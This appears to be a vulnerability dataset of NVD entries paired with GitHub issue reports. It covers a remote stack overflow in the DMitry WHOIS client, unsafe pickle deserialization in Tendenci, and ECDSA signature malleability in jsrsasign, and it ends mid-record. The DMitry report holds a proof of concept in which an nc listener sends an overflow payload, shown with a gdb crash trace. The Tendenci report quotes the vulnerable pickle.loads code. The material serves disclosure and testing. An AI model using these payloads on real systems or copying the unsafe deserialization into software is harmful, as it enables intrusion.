[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dmitry_project:dmitry:1.3a:*:*:*:*:*:*:*", "matchCriteriaId": "1678D5E3-D98D-4EDB-8611-9A1BECFE0325", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jaygreig86/dmitry/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jaygreig86", "dmitry" ]
Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP. This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code. **PoC:** For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local `/etc/hosts`: ``` 127.0.0.1 Af.whois-servers.net ``` Next, I use `nc` to act as the WHOIS server: ``` echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43 ``` While that's running, let's see what happens in DMitry: ``` $ gdb ./dmitry [...] (gdb) r -w EAf Starting program: [...]/dmitry -w EAf Deepmagic Information Gathering Tool "There be some deep magic going on" ERROR: Unable to locate Host IP addr. for EAf Continuing with limited modules HostIP: HostName:EAf Gathered Inic-whois information for EAf --------------------------------- Domain Name: foo Domain Status: bar AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo Domain Status: bar AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo Domain Status: bar AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�--------------------------------- �����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU Program received signal SIGSEGV, Segmentation fault. 0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141 141 if ( strlen(frmtdbuff) ) linetodo = 1; (gdb) bt #0 0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141 #1 0x4141555555557dfc in ?? () #2 0x4141414141414141 in ?? () #3 0x41417fffffffe240 in ?? () #4 0x4e206e69616d6f44 in ?? () #5 0x6f6f66203a656d61 in ?? () #6 0x206e69616d6f440a in ?? () #7 0x203a737574617453 in ?? () #8 0x414141410a726162 in ?? () #9 0x4141414141414141 in ?? () #10 0x4141414141414141 in ?? () #11 0x4141414141414141 in ?? () #12 0x4141414141414141 in ?? () #13 0x4141414141414141 in ?? () #14 0x4141414141414141 in ?? () [...] ``` Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.
Remote Stack Overflow (possible RCE)
https://api.github.com/repos/jaygreig86/dmitry/issues/4/comments
1
2020-06-19T16:45:09Z
2020-07-02T14:54:22Z
https://github.com/jaygreig86/dmitry/issues/4
642,103,179
4
1,301
CVE-2020-14942
2020-06-21T15:15:10.903
Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tendenci/tendenci/issues/867" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tendenci/tendenci/issues/867" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tendenci:tendenci:12.0.10:*:*:*:*:*:*:*", "matchCriteriaId": "B71B64BD-B2E6-48DD-829E-BAF28E712648", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/tendenci/tendenci/issues/867
[ "Third Party Advisory" ]
github.com
[ "tendenci", "tendenci" ]
`tendenci\apps\helpdesk\views\staff.py` There is no limit to the input of the pickle called, there will be problems ``` def ticket_list(request): context = {} ...... if request.GET.get('saved_query', None): from_saved_query = True try: saved_query = SavedSearch.objects.get(pk=request.GET.get('saved_query')) except SavedSearch.DoesNotExist: return HttpResponseRedirect(reverse('helpdesk_list')) if not (saved_query.shared or saved_query.user == request.user): return HttpResponseRedirect(reverse('helpdesk_list')) import pickle from base64 import b64decode query_params = pickle.loads(b64decode(str(saved_query.query).encode())) elif not ( 'queue' in request.GET or 'assigned_to' in request.GET or 'status' in request.GET or 'q' in request.GET or 'sort' in request.GET or 'sortreverse' in request.GET ): ``` query field ``` import pickle from base64 import b64encode urlsafe_query = b64encode(pickle.dumps(query_params)).decode() ``` Find the request to save the field from the form ``` <form method='post' action='{% url 'helpdesk_savequery' %}'> <input type='hidden' name='query_encoded' value='{{ urlsafe_query }}' /> <dl> <dt><label for='id_title'>{% trans "Query Name" %}</label></dt> <dd><input type='text' name='title' id='id_title' /></dd> <dd class='form_help_text'>{% trans "This name appears in the drop-down list of saved queries. If you share your query, other users will see this name, so choose something clear and descriptive!" %}</dd> <dt><label for='id_shared'>{% trans "Shared?" %}</label></dt> <dd><input type='checkbox' name='shared' id='id_shared' /> {% trans "Yes, share this query with other users." %}</dd> <dd class='form_help_text'>{% trans "If you share this query, it will be visible by <em>all</em> other logged-in users." %}</dd> </dl> <div class='buttons'> <input class="btn btn-primary" type='submit' value='{% trans "Save Query" %}'> </div> {% csrf_token %}</form> ``` Save the field as follows ``` def save_query(request): title = request.POST.get('title', None) shared = request.POST.get('shared', False) in ['on', 'True', True, 'TRUE'] query_encoded = request.POST.get('query_encoded', None) if not title or not query_encoded: return HttpResponseRedirect(reverse('helpdesk_list')) query = SavedSearch(title=title, shared=shared, query=query_encoded, user=request.user) query.save() ``` This place is to save the serialized value to the template, and then the front-end template uses the encoded value request, and the background is deserialized. eg: https://docs.python.org/3/library/pickle.html
Unrestricted deserialization
https://api.github.com/repos/tendenci/tendenci/issues/867/comments
5
2020-06-19T05:57:47Z
2020-12-04T19:17:54Z
https://github.com/tendenci/tendenci/issues/867
641,725,716
867
1,302
CVE-2020-14966
2020-06-22T12:15:10.087
An issue was discovered in the jsrsasign package through 8.0.18 for Node.js. It allows a malleability in ECDSA signatures by not checking overflows in the length of a sequence and '0' characters appended or prepended to an integer. The modified signatures are verified as valid. This could have a security-relevant impact if an application relied on a single canonical signature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/437" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.17" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.18" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0001/" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jsrsasign" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/437" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jsrsasign" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsrsasign_project:jsrsasign:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "435B4E0A-10B0-41B8-B6DA-454D375C127D", "versionEndExcluding": null, "versionEndIncluding": "8.0.18", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*", "matchCriteriaId": "FD1FCB0D-3E19-4461-9330-4D7F02972A35", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "347" ]
347
https://github.com/kjur/jsrsasign/issues/437
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kjur", "jsrsasign" ]
Hello, I've found that jsrsasign 8.0.16 allows a certain degree of malleability in ECDSA signatures by not checking overflows in the length of sequence and 0s appended or prepended to an integer. Using the secp256r1 curve it its possible to verify this issue using the following test vectors of Google Wycheproof: ``` { "algorithm" : "ECDSA", "generatorVersion" : "0.8r12", "numberOfTests" : 387, "header" : [ "Test vectors of type EcdsaVerify are meant for the verification", "of ASN encoded ECDSA signatures." ], "notes" : { "BER" : "This is a signature with correct values for (r, s) but using some alternative BER encoding instead of DER encoding. Implementations should not accept such signatures to limit signature malleability.", "EdgeCase" : "Edge case values such as r=1 and s=0 can lead to forgeries if the ECDSA implementation does not check boundaries and computes s^(-1)==0.", "MissingZero" : "Some implementations of ECDSA and DSA incorrectly encode r and s by not including leading zeros in the ASN encoding of integers when necessary. Hence, some implementations (e.g. jdk) allow signatures with incorrect ASN encodings assuming that the signature is otherwise valid.", "PointDuplication" : "Some implementations of ECDSA do not handle duplication and points at infinity correctly. This is a test vector that has been specially crafted to check for such an omission." }, "schema" : "ecdsa_verify_schema.json", "testGroups" : [ { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "042927b10512bae3eddcfe467828128bad2903269919f7086069c8c4df6c732838c7787964eaac00e5921fb1498a60f4606766b3d9685001558d1a974e7341513e", "wx" : "2927b10512bae3eddcfe467828128bad2903269919f7086069c8c4df6c732838", "wy" : "00c7787964eaac00e5921fb1498a60f4606766b3d9685001558d1a974e7341513e" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200042927b10512bae3eddcfe467828128bad2903269919f7086069c8c4df6c732838c7787964eaac00e5921fb1498a60f4606766b3d9685001558d1a974e7341513e", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEKSexBRK64+3c/kZ4KBKLrSkDJpkZ\n9whgacjE32xzKDjHeHlk6qwA5ZIfsUmKYPRgZ2az2WhQAVWNGpdOc0FRPg==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 1, "comment" : "signature malleability", "msg" : "313233343030", "sig" : "304402202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e1802204cd60b855d442f5b3c7b11eb6c4e0ae7525fe710fab9aa7c77a67f79e6fadd76", "result" : "valid", "flags" : [] }, { "tcId" : 2, "comment" : "Legacy:ASN encoding of s misses leading 0", "msg" : "313233343030", "sig" : "304402202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180220b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "acceptable", "flags" : [ "MissingZero" ] }, { "tcId" : 3, "comment" : "valid", "msg" : "313233343030", "sig" : "304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "valid", "flags" : [] }, { "tcId" : 4, "comment" : "long form encoding of length of sequence", "msg" : "313233343030", "sig" : "30814502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 5, "comment" : "length of sequence contains leading 0", "msg" : "313233343030", "sig" : "3082004502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 6, "comment" : "wrong length of sequence", "msg" : "313233343030", "sig" : "304602202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 7, "comment" : "wrong length of sequence", "msg" : "313233343030", "sig" : "304402202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 8, "comment" : "uint32 overflow in length of sequence", "msg" : "313233343030", "sig" : "3085010000004502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 9, "comment" : "uint64 overflow in length of sequence", "msg" : "313233343030", "sig" : "308901000000000000004502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 10, "comment" : "length of sequence = 2**31 - 1", "msg" : "313233343030", "sig" : "30847fffffff02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 11, "comment" : "length of sequence = 2**32 - 1", "msg" : "313233343030", "sig" : "3084ffffffff02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 12, "comment" : "length of sequence = 2**40 - 1", "msg" : "313233343030", "sig" : "3085ffffffffff02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 13, "comment" : "length of sequence = 2**64 - 1", "msg" : "313233343030", "sig" : "3088ffffffffffffffff02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 14, "comment" : "incorrect length of sequence", "msg" : "313233343030", "sig" : "30ff02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 15, "comment" : "indefinite length without termination", "msg" : "313233343030", "sig" : "308002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 16, "comment" : "indefinite length without termination", "msg" : "313233343030", "sig" : "304502802ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 17, "comment" : "indefinite length without termination", "msg" : "313233343030", "sig" : "304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18028000b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 18, "comment" : "removing sequence", "msg" : "313233343030", "sig" : "", "result" : "invalid", "flags" : [] }, { "tcId" : 19, "comment" : "lonely sequence tag", "msg" : "313233343030", "sig" : "30", "result" : "invalid", "flags" : [] }, { "tcId" : 20, "comment" : "appending 0's to sequence", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [] }, { "tcId" : 21, "comment" : "prepending 0's to sequence", "msg" : "313233343030", "sig" : "3047000002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 22, "comment" : "appending unused 0's to sequence", "msg" : "313233343030", "sig" : "304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [] }, { "tcId" : 23, "comment" : "appending null value to sequence", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0500", "result" : "invalid", "flags" : [] }, { "tcId" : 24, "comment" : "including garbage", "msg" : "313233343030", "sig" : "304a498177304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 25, "comment" : "including garbage", "msg" : "313233343030", "sig" : "30492500304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 26, "comment" : "including garbage", "msg" : "313233343030", "sig" : "3047304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0004deadbeef", "result" : "invalid", "flags" : [] }, { "tcId" : 27, "comment" : "including garbage", "msg" : "313233343030", "sig" : "304a222549817702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 28, "comment" : "including garbage", "msg" : "313233343030", "sig" : "30492224250002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 29, "comment" : "including garbage", "msg" : "313233343030", "sig" : "304d222202202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180004deadbeef022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 30, "comment" : "including garbage", "msg" : "313233343030", "sig" : "304a02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e182226498177022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 31, "comment" : "including garbage", "msg" : "313233343030", "sig" : "304902202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e1822252500022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 32, "comment" : "including garbage", "msg" : "313233343030", "sig" : "304d02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e182223022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0004deadbeef", "result" : "invalid", "flags" : [] }, { "tcId" : 33, "comment" : "including undefined tags", "msg" : "313233343030", "sig" : "304daa00bb00cd00304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 34, "comment" : "including undefined tags", "msg" : "313233343030", "sig" : "304baa02aabb304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 35, "comment" : "including undefined tags", "msg" : "313233343030", "sig" : "304d2228aa00bb00cd0002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 36, "comment" : "including undefined tags", "msg" : "313233343030", "sig" : "304b2226aa02aabb02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 37, "comment" : "including undefined tags", "msg" : "313233343030", "sig" : "304d02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e182229aa00bb00cd00022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 38, "comment" : "including undefined tags", "msg" : "313233343030", "sig" : "304b02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e182227aa02aabb022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 39, "comment" : "truncated length of sequence", "msg" : "313233343030", "sig" : "3081", "result" : "invalid", "flags" : [] }, { "tcId" : 40, "comment" : "using composition with indefinite length", "msg" : "313233343030", "sig" : "3080304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [] }, { "tcId" : 41, "comment" : "using composition with indefinite length", "msg" : "313233343030", "sig" : "3049228002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180000022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 42, "comment" : "using composition with indefinite length", "msg" : "313233343030", "sig" : "304902202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e182280022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [] }, { "tcId" : 43, "comment" : "using composition with wrong tag", "msg" : "313233343030", "sig" : "3080314502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [] }, { "tcId" : 44, "comment" : "using composition with wrong tag", "msg" : "313233343030", "sig" : 